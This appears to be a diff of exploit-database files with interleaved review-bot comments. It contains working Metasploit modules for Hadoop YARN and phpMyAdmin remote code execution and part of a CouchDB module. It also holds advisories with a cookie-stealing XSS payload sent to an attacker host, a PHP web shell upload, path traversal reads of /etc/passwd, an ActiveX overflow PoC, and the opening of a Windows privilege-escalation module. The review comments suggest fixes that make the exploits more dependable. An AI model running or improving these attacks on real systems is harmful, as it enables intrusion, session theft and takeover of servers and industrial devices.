'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd2}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("/bin/sh #{rand_file}")
)

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
'method' => 'PUT',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd2}"})
)
end

def cmdstager_path
@cmdstager_path ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
end

end
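Review bot: the last branch of send_payload, `elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')`, is always true, because the right-hand operand is a bare Gem::Version object rather than a comparison; the intended test `version >= Gem::Version.new('2.1.0')` never runs. As written the branch behaves as a plain `else`, which happens to yield the right NotVulnerable result for both 1.7.0 <= version < 2.0.0 and version >= 2.1.0, but it hides that intent; write it as `else` or fix the comparison. Two smaller points in the same method: the `version` parameter is used only for the status line and is then shadowed by `version = Gem::Version.new(@version)`, so either drop the parameter or use it consistently; and 'automaticly' in the NoTarget message should read 'automatically'. In payload2, `res.get_json_document['all_nodes'][0]` is dereferenced without checking that the /_membership request returned a response, so a timeout raises NoMethodError instead of a clean fail_with; get_version already shows the `unless res` pattern to copy.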
exploits/linux/remote/45025.rb (Executable file, 92 lines)
@@ -0,0 +1,92 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',
'Description' => %q{
This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
},
'License' => MSF_LICENSE,
'Author' =>
[
'cbmixx', # Proof of concept
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
],
'References' =>
[
['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
['Automatic', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 19 2016',
'DefaultTarget' => 0
))

register_options([Opt::RPORT(8088)])
end

def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
)
rescue Rex::ConnectionError
vprint_error("#{peer} - Connection failed")
return CheckCode::Unknown
end

if res && res.code == 200 && res.body.include?('application-id')
return CheckCode::Detected
end

CheckCode::Safe
end

def exploit
print_status('Sending Command')
execute_cmdstager
end

def execute_command(cmd, opts = {})
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
)

app_id = res.get_json_document['application-id']

post = {
'application-id' => app_id,
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
'application-type' => 'YARN',
'am-container-spec' => {
'commands' => {'command' => cmd.to_s}
}
}

send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
'method' => 'POST',
'ctype' => 'application/json',
'data' => post.to_json
)
end

end
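Review bot: execute_command dereferences `res.get_json_document['application-id']` without checking that `res` is non-nil and that the POST to /ws/v1/cluster/apps/new-application returned 200, so a timeout or a ResourceManager that rejects the request (Kerberos or ACLs enabled) raises NoMethodError instead of a clean fail_with; guard it the way `check` already does with `res && res.code == 200`. The return value of the second POST to /ws/v1/cluster/apps is also discarded, so a 4xx there is never reported and the module claims success on a failed submission. One documentation point for the module header: `check` is not passive, since the new-application call allocates an application id on the cluster and is recorded in the ResourceManager's application and audit logs; the Description should say so, both for operators reviewing their logs and for users who expect a check to leave no trace.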
exploits/php/remote/45020.rb (Executable file, 234 lines)
@@ -0,0 +1,234 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'phpMyAdmin Authenticated Remote Code Execution',
'Description' => %q{
phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion,
which can be exploited post-authentication to execute PHP code by
application. The module has been tested with phpMyAdmin v4.8.1.
},
'Author' =>
[
'ChaMd5', # Vulnerability discovery and PoC
'Henry Huang', # Vulnerability discovery and PoC
'Jacob Robles' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '104532' ],
[ 'CVE', '2018-12613' ],
[ 'CWE', '661' ],
[ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ],
[ 'URL', 'https://www.secpulse.com/archives/72817.html' ],
[ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ]
],
'Privileged' => false,
'Platform' => [ 'php' ],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Windows', {} ],
[ 'Linux', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 19 2018'))

register_options(
[
OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
])
end

def check
begin
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
rescue
vprint_error("#{peer} - Unable to connect to server")
return Exploit::CheckCode::Unknown
end

if res.nil? || res.code != 200
vprint_error("#{peer} - Unable to query /js/messages.php")
return Exploit::CheckCode::Unknown
end

# v4.8.0 || 4.8.1 phpMyAdmin
if res.body =~ /PMA_VERSION:"(\d+\.\d+\.\d+)"/
version = Gem::Version.new($1)
vprint_status("#{peer} - phpMyAdmin version: #{version}")

if version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1')
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end

return Exploit::CheckCode::Unknown
end

def query(uri, qstring, cookies, token)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'import.php'),
'cookie' => cookies,
'vars_post' => Hash[{
'sql_query' => qstring,
'db' => '',
'table' => '',
'token' => token
}.to_a.shuffle]
})
end

def lfi(uri, data_path, cookies, token)
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'encode_params' => false,
'vars_get' => {
'target' => "db_sql.php%253f#{'/..'*16}#{data_path}"
}
})
end

def exploit
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end

uri = target_uri.path
vprint_status("#{peer} - Grabbing CSRF token...")

response = send_request_cgi({'uri' => uri})

if response.nil?
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage grabbing CSRF token")
elsif response.body !~ /token"\s*value="(.*?)"/
fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
end
token = Rex::Text.html_decode($1)

if target.name =~ /Automatic/
/\((?<srv>Win.*)?\)/ =~ response.headers['Server']
mytarget = srv.nil? ? 'Linux' : 'Windows'
else
mytarget = target.name
end

vprint_status("#{peer} - Identified #{mytarget} target")

#Pull out the last two cookies
cookies = response.get_cookies
cookies = cookies.split[-2..-1].join(' ')

vprint_status("#{peer} - Retrieved token #{token}")
vprint_status("#{peer} - Retrieved cookies #{cookies}")
vprint_status("#{peer} - Authenticating...")

login = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_post' => {
'token' => token,
'pma_username' => datastore['USERNAME'],
'pma_password' => datastore['PASSWORD']
}
})

if login.nil? || login.code != 302
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
end

#Ignore the first cookie
cookies = login.get_cookies
cookies = cookies.split[1..-1].join(' ')
vprint_status("#{peer} - Retrieved cookies #{cookies}")

login_check = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => { 'token' => token },
'cookie' => cookies
})

if login_check.nil?
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
elsif login_check.body.include? 'Welcome to'
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
elsif login_check.body !~ /token"\s*value="(.*?)"/
fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
end
token = Rex::Text.html_decode($1)

vprint_status("#{peer} - Authentication successful")

#Generating strings/payload
database = rand_text_alpha_lower(5)
table = rand_text_alpha_lower(5)
column = rand_text_alpha_lower(5)
col_val = "'<?php eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\")); ?>'"


#Preparing sql queries
dbsql = "CREATE DATABASE #{database};"
tablesql = "CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});"
dropsql = "DROP DATABASE #{database};"
dirsql = 'SHOW VARIABLES WHERE Variable_Name Like "%datadir";'

#Create database
res = query(uri, dbsql, cookies, token)
if res.nil? || res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create database")
end

#Create table and column
res = query(uri, tablesql, cookies, token)
if res.nil? || res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create table")
end

#Find datadir
res = query(uri, dirsql, cookies, token)
if res.nil? || res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
end

unless res.body =~ /^<td data.*?>(.*)?</
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
end

#Creating include path
if mytarget == 'Windows'
#Table file location
data_path = $1.gsub(/\\/, '/')
data_path = data_path.sub(/^.*?\//, '/')
data_path << "#{database}/#{table}.frm"
else
#Session path location
/phpMyAdmin=(?<session_name>.*?);/ =~ cookies
data_path = "/var/lib/php/sessions/sess_#{session_name}"
end

res = lfi(uri, data_path, cookies, token)

#Drop database
res = query(uri, dropsql, cookies, token)
if res.nil? || res.code != 200
print_error("#{peer} - Failed to drop database #{database}. Might drop when your session closes.")
end
end
end
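Review bot: the error message in `check`, `Unable to query /js/messages.php`, does not match the request two lines above it, which fetches `normalize_uri(target_uri.path)`; fix the message so a failed check points at the URI that was actually requested. In `exploit`, the result of `lfi(uri, data_path, cookies, token)` is assigned to `res` but never inspected, so a failed include is silent and the module proceeds straight to `DROP DATABASE`, reporting neither success nor failure for the step that matters; check `res` (nil or non-200) there and fail_with before cleanup, or drop the unused assignment. The Linux branch also hardcodes `/var/lib/php/sessions/`, a single distribution's session.save_path; the Description should state that assumption so users know why the Linux target can fail on a host whose PHP stores sessions elsewhere. Minor: in the Description, 'execute PHP code by application' is missing a word.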
exploits/php/webapps/45014.txt (Normal file, 325 lines)
@@ -0,0 +1,325 @@
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 >
=======================================================================
title: Remote code execution via multiple attack vectors
product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1
vulnerable version: FW 01 - 01.01.10(01)
fixed version: FW 02
CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981
impact: High
homepage: https://www.wago.com/
found: 2018-04-25
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"New ideas are the driving force behind our success WAGO is a family-owned
company headquartered in Minden, Germany. Independently operating for three
generations, WAGO is the global leader of spring pressure electrical
interconnect and automation solutions. For more than 60 years, WAGO has
developed and produced innovative products for packaging, transportation,
process, industrial and building automation markets amongst others. Aside from
its innovations in spring pressure connection technology, WAGO has introduced
numerous innovations that have revolutionized industry. Further ground-breaking
inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."

Source: http://www.wago.us/wago/

"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY
7300T Web Panels help you reinforce the quality of your machinery and equipment
with a refined design and industry-leading software. Learn more about how the
right Web Panels make a difference.

HMI components are the finishing touch for machines or systems and they have an
overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing
HMIs that leave a lasting impression and significantly increase both the value
and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is
available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes."

Source:
http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp


Business recommendation:
------------------------
HMI displays are widely used in SCADA infrastructures. The link between
their administrative (or informational) web interfaces and the users which
access these interfaces is critical. The presented attacks demonstrate how
simple it is to inject malicious code in order to break the security of this
link by exploiting minimal user interaction.

As a consequence a computer which is used for HMI administration should not
provide any possibility to get compromised via malicious script code.

One possible solution may be e.g.:
* Don't allow email clients
* Don't provide Internet access at all on the HMI stations

SEC Consult recommends to immediately apply the available patches from the vendor.
A thorough security review should be performed by security professionals to
identify further potential security issues.


Vulnerability overview/description:
-----------------------------------
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
Reflected cross site scripting vulnerabilities were identified within multiple PHP
scripts in the admin interface. The parameter JSON input which is sent to the
device is not sanitized sufficiently. An attacker can exploit this
vulnerability to execute arbitrary scripts in the context of the attacked user
and gain control over the active session.

This vulnerability is present for authenticated and unauthenticated users!


2) Stored Cross-Site Scripting (CVE-2018-12981)
A stored cross-site scripting vulnerability was identified within the
"PLC List" which can be configured in the web interface of the e!Display. By
storing a payload there, an administrative or guest user can be attacked
without tricking them to visit a malicious web site or clicking on an
malicious link.

This vulnerability is only present for authenticated users!


3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
Arbitrary files can be uploaded to the system without any check. It is even
possible to change the location of the uploaded file on the system. As the
web service does not run as privileged user, it is not possible to upload a
file directly to the web root but on many other locations on the file system.
The normal user 'user' and the administrative user 'admin' can both upload
files to the system.


4) Incorrect Default Permissions (CVE-2018-12979)
Due to incorrect default permissions a file in the web root can be overwritten
by the unprivileged 'www' user. This is the same user which is used in the
context of the web server.


5) Remote code execution via multiple attack vectors
By stacking vulnerability 1)/2), 3) and 4) with this vulnerability an outside
attacker can place a malicious script on the device in order to execute arbitrary
commands as 'www'. This can be done by uploading a web shell or a reverse
shell.


Proof of concept:
-----------------
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
The affected endpoints are:
http://<IP-Address>/wbm/configtools.php
http://<IP-Address>/wbm/login.php
http://<IP-Address>/wbm/receive_upload.php

The following request is an example for reflected XSS within 'configtools.php':
-------------------------------------------------------------------------------
POST /wbm/configtools.php HTTP/1.1
Host: <IP-Address>
Content-type: text/plain
[...]

{"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml}<img
src=x onerror=this.src='http://$attacker:8001/?c='+document.cookie>;"}}}
-------------------------------------------------------------------------------


Steal the cookie via XSS and send it to http://$attacker:8001?c=<Session-ID>:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<IP-Address>/wbm/configtools.php" method="POST"
enctype="text/plain">
<input type="hidden"
name="{"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml}<img src"
value="x onerror=this.src='http://...:8001/?c='+document.cookie>;"}}}"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------


2) Stored Cross-Site Scripting (CVE-2018-12981)
To exploit this vulnerability malicious code has to be placed in the "PLC List"
by surfing to the endpoint http://<IP-Address>/app/index.html and clicking on
the tab "Application->PLC-List". By opening one of the configurable PLCs the
name can be changed in the box "Text:" in order to execute arbitrary script-
code. For example:
<img src=a onerror=alert('SEC_Consult_XSS');alert(document.cookie)>

The payload can also be placed on the device by using the following POST request:
-------------------------------------------------------------------------------
POST /wbm/configtools.php HTTP/1.1
Host: <IP-Address>
[...]

{"sessionId":"<Valid session-ID>
","aDeviceParams":{"0":{"name":"config_plcselect","parameter":[2,"url=https://127.0.0.1:8001","txt=<img
src=a
onerror=alert('SEC_Consult_XSS');alert(document.cookie)>","vkb=enabled","mon=1"],"sudo":true}}}
-------------------------------------------------------------------------------


3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
The file path, the file name and the file content can be manipulated in any
way. There is no server-side check for malicious files.

-------------------------------------------------------------------------------
POST /wbm/receive_upload.php HTTP/1.1
Host: <IP-Address>
[...]
Content-Type: multipart/form-data;
boundary=---------------------------728140389204955163192597293

-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="touchWbm"

true
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_type"

font
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="session_id"

<Valid session-ID>
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_directory"

/tmp/
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="font_file"; filename="any_file.sh"
Content-Type: application/x-font-ttf

any-content #!


-----------------------------728140389204955163192597293--
-------------------------------------------------------------------------------


4) Incorrect Default Permissions (CVE-2018-12979)
The file 'index.html' is owned by 'www' and can therefore also be overwritten
with a web shell.

www@WAGO_eDisplay:/var/www ls -la
drwxr-xr-x 5 root root 488 XXX 99 2018 .
drwxr-xr-x 11 root root 824 XXX 99 2018 ..
lrwxrwxrwx 1 root root 16 XXX 99 2018 app -> /var/www/WagoWBM
-rw-r--r-- 1 www www 345 XXX 99 2018 index.html
drwxr-xr-x 7 root root 776 XXX 99 2018 plclist
drwxr-xr-x 3 root root 368 XXX 99 2018 WagoWBM
drwxr-xr-x 2 root root 688 XXX 99 2018 wbm


5) Remote code execution via multiple attack vectors
By uploading a simple PHP shell and overwriting the 'index.html' file located
under the web root an attacker can place a web shell which is reachable without
any authentication.

-------------------------------------------------------------------------------
POST /wbm/receive_upload.php HTTP/1.1
Host: <IP-Address>
[...]
Content-Type: multipart/form-data;
boundary=---------------------------728140389204955163192597293

-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="touchWbm"

true
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_type"

font
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="session_id"

<Valid session-ID>
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_directory"

/var/www/
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="font_file"; filename="index.html"
Content-Type: application/x-font-ttf

<html><body>
<form method="GET" name="SEC Consult PoC" action="">
<input type="text" name="command"><input type="submit" value="Send"></form>
<pre><?php if($_GET['command']){system($_GET['command']);} ?></pre>
</body></html>


-----------------------------728140389204955163192597293--
-------------------------------------------------------------------------------

The shell can now be reached via "http://<IP-Address>/index.html". It is also
possible to upload a reverse-shell to the system which connects to a computer
outside of the actual network.


Vulnerable / tested versions:
-----------------------------
The following device with the firmware version has been tested:

* e!DISPLAY 7300T - WP 4.3 480x272 PIO1 - 01.01.10(01)

According to WAGO the following e!DISPLAY versions are vulnerable:
762-3000 FW 01
762-3001 FW 01
762-3002 FW 01
762-3003 FW 01


Vendor contact timeline:
------------------------
2018-04-30: Sending encrypted advisory to VDE CERT for coordination support
(info@cert.vde.com)
2018-05-02: Answer from VDE CERT that WAGO will be informed/contacted
2018-05-08: Status update from VDE CERT
2018-05-23: Asking for status update, no news from WAGO (via VDE CERT)
2018-06-08: VDE CERT: WAGO fixed the vulnerabilities and firmware is in
testing phase
2018-06-12: WAGO requested more time, postponing release date, asking for
affected & fixed versions
2018-06-13: VDE CERT will request CVE numbers
2018-06-17: WAGO scheduled the release for 2018-07-11
2018-06-26: VDE CERT sends WAGO advisory draft including affected/fixed versions
2018-07-04: VDE CERT sends final WAGO advisory incl. CVE numbers
2018-07-10: VDE CERT publishes security notice:
https://cert.vde.com/de-de/advisories/vde-2018-010
2018-07-11: SEC Consult advisory release


Solution:
---------
Update the device to the latest available firmware (FW 02). For further
information see the vendor's security notifications page:

https://www.wago.com/de/automatisierungstechnik/security (German)

Direct link to English WAGO advisory:
https://www.wago.com/medias/SA-WBM-2018-004.pdf?context=bWFzdGVyfHJvb3R8MjgyNzYwfGFwcGxpY2F0aW9uL3BkZnxoMWUvaDg4LzkzNjE3NTIxOTUxMDIucGRmfDU1NmJkYjEzNDY0ZGU4OWQ1OTMyMjUwNTlmZTI0MzgwNDQ1MDY1YzU3OWRmZDk1NzYzODAwMDI3ODg1NDJlZjU



Workaround:
-----------
Restrict network access to the device, don't allow Internet access from the
HMI station and do not install software from untrusted sources.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
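Review bot: the Workaround section is narrower than the advisory's own findings: it lists only network restriction, no Internet access from the HMI station and no untrusted software, but section 1 states the reflected XSS is reachable by unauthenticated users and the PoC is a cross-origin auto-submitted form, so an operator opening a message on the HMI station is sufficient for the full chain 1)/3)/4)/5); the "Don't allow email clients" item from Business recommendation belongs in Workaround as well, and it is worth stating that the chain ends in an unauthenticated web shell at /index.html, which defenders can monitor for by checking that file's hash and ownership (section 4 shows it is the only web-root file owned by 'www'). Section 4's directory listing has its timestamps redacted as 'XXX 99 2018'; say so, otherwise it reads as corrupted output. Grammar: section 2 'clicking on an malicious link' should be 'a malicious link'; section 3 'does not run as privileged user' should be 'as a privileged user'.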
152
exploits/php/webapps/45016.txt
Normal file
152
exploits/php/webapps/45016.txt
Normal file
|
@ -0,0 +1,152 @@
|
|||
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
=======================================================================
title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
vulnerable version: <=14.2.0
fixed version: >=14.2.1
CVE number: CVE-2018-13981, CVE-2018-13980
impact: critical
homepage: https://www.zeta-producer.com
found: 2017-11-25
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"With Zeta Producer, the website builder and online shop system for Windows,
you can create and manage your website locally, on your computer.
Get without expertise in 3 steps to your own homepage: select design,
paste content, publish website. Finished."

Source: https://www.zeta-producer.com/de/index.html


Business recommendation:
------------------------
The vendor provides a patched version which should be installed immediately.

Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.

Furthermore, an in-depth security analysis is highly advised, as the software may be
affected from further security issues.


Vulnerability overview/description:
-----------------------------------
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files
to the server but if the user uploads a PHP script with a .php extension
then the server will rename it to .phps to prevent PHP code execution.

However, the attacker can upload .php5 or .phtml to the server without any
restriction. These alternative file extensions can be executed as PHP code.

Furthermore, the server will create a folder to store the files, with a
random name using PHP's "uniqid" function.

Unfortunately, if the server permits directory listing, the attacker
can easily browse to the uploaded PHP script. If no directory listing is
enabled the attacker can still bruteforce the random name to gain remote
code execution via the PHP script as well. Testing on a local server it
took about 20 seconds to brute force the random name. This attack will
be slower over the Internet but it is still feasible.

Also, if the user runs the Zeta Producer Desktop CMS GUI client locally,
they are also vulnerable because the web server will be running on TCP port 9153.

The root cause is in the widget "formmailer" which is enabled by default.
The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php


2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an
unauthenticated attacker can read local files by exploiting path traversal issues.

The following files are affected:
- /assets/php/filebrowser/filebrowser.main.php


Proof of concept:
-----------------
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.
[.. code has been removed to prevent misuses ..]

When the script is executed, a PHP script (shell) will be uploaded automatically.
# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)


2) Local File Disclosure (CVE-2018-13980)
The parameter "file" in the "filebrowser.main.php" script can be exploited to read
arbitrary files from the OS with the privileges of the web server user.
Any unauthenticated user can exploit this issue!

http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc&do=list


Vulnerable / tested versions:
-----------------------------
The following versions have been tested which were the latest version available
at the time of the test:

Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0

Source:
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/


Vendor contact timeline:
------------------------
2017-11-29: Contacting vendor through info@zeta-producer.com and various other
email addresses from the website. No reply.
2017-12-13: Contacting vendor again, extending email address list, no reply
2018-01-09: Contacting vendor again
2018-01-10: Vendor replies, requests transmission of security advisory
2018-01-10: Sending unencrypted security advisory
2018-07-02: There was no feedback from the vendor but the version 14.2.1 fixed
the reported vulnerabilities.
2018-07-12: Public advisory release.


Solution:
---------
Upgrade to version 14.2.1 or newer. See the vendor's download page:

https://www.zeta-producer.com/de/download.html

Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.


Workaround:
-----------
Remove "formmailer" and "filebrowser" widgets.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
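Review bot: the timeline entry "2018-07-02: There was no feedback from the vendor but the version 14.2.1 fixed the reported vulnerabilities." does not say how the fix was verified. The RCE description rests on a denylist (.php is renamed to .phps, while .php5 and .phtml pass through) plus a guessable uniqid() directory name, so the Solution section should state whether 14.2.1 enforces an upload-extension allowlist and whether the upload directory is still listable, so that readers can re-test after updating rather than trust the version number alone. Style point: the four-line paragraph beginning "Users of the product also need to verify that the affected widgets are updated in" appears verbatim under both Business recommendation and Solution; keep one copy.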
73
exploits/windows/dos/45017.html
Normal file

@ -0,0 +1,73 @@
<!--
=====[ Tempest Security Intelligence - ADV-24/2018 ]===

G DATA TOTAL SECURITY v25.4.0.3 Activex Buffer Overflow
Author: Filipe Xavier Oliveira
Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]=====================================================

* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References

=====[ Overview]==============================================================

* System affected : G DATA TOTAL SECURITY [1].
* Software Version : 25.4.0.3 (other versions may also be affected).
* Impact : A user may be affected by opening a malicious black list
email in the antispam filter,

=====[ Detailed description]==================================================
The GDASPAMLib.AntiSpam ActiveX control ASK\GDASpam.dll in G DATA Total
Security 25.4.0.3 has a buffer overflow via a long IsBlackListed argument.
Through a long input in a member of class called Antispam, isblackedlist
class is vulnerable a buffer overflow.

A poc that causes a buffer overflow :
-->

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:B9D1548D-4339-485A-ABA2-F9F9C1CBF8AC' id='target' />
<script language='vbscript'>


'for debugging/custom prolog
targetFile = "C:\Program Files\G DATA\TotalSecurity\ASK\GDASpam.dll"
prototype = "Function IsBlackListed ( ByVal strIP As String ) As Long"
memberName = "IsBlackListed"
progid = "GDASPAMLib.AntiSpam"
argCount = 1

arg1=String(14356, "A")

target.IsBlackListed arg1

</script></job></package>

<!--
=====[ Timeline of disclosure]===============================================

04/10/2018 - Vulnerability reported.
04/17/2018 - The vendor will fix the vulnerability.
05/24/2017 - Vulnerability fixed.

07/12/2018 - CVE assigned [1]

=====[ Thanks & Acknowledgements]============================================

- Tempest Security Intelligence / Tempest's Pentest Team [3]

=====[ References]===========================================================

[1] https://www.gdatasoftware.com/

[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10018

[3] http://www.tempest.com.br

=====[ EOF]====================================================================
-->
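Review bot: the timeline line "05/24/2017 - Vulnerability fixed." is dated a year before the report ("04/10/2018 - Vulnerability reported."), almost certainly a typo for 2018, and "07/12/2018 - CVE assigned [1]" points at the vendor homepage although the CVE entry (CVE-2018-10018) is reference [2]. Smaller points in the same file: the Impact bullet ends with a comma instead of a period, and "isblackedlist class is vulnerable a buffer overflow" should read "the IsBlackListed method is vulnerable to a buffer overflow", matching the prototype quoted in the script ("Function IsBlackListed ( ByVal strIP As String ) As Long").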
174
exploits/windows/local/45024.rb
Executable file

@ -0,0 +1,174 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',
'Description' => %q{
This module exploits a vulnerability in a statement in the system programming guide
of the Intel 64 and IA-32 architectures software developer's manual being mishandled
in various operating system kerneles, resulting in unexpected behavior for #DB
excpetions that are deferred by MOV SS or POP SS.

This module will upload the pre-compiled exploit and use it to execute the final
payload in order to gain remote code execution.
},
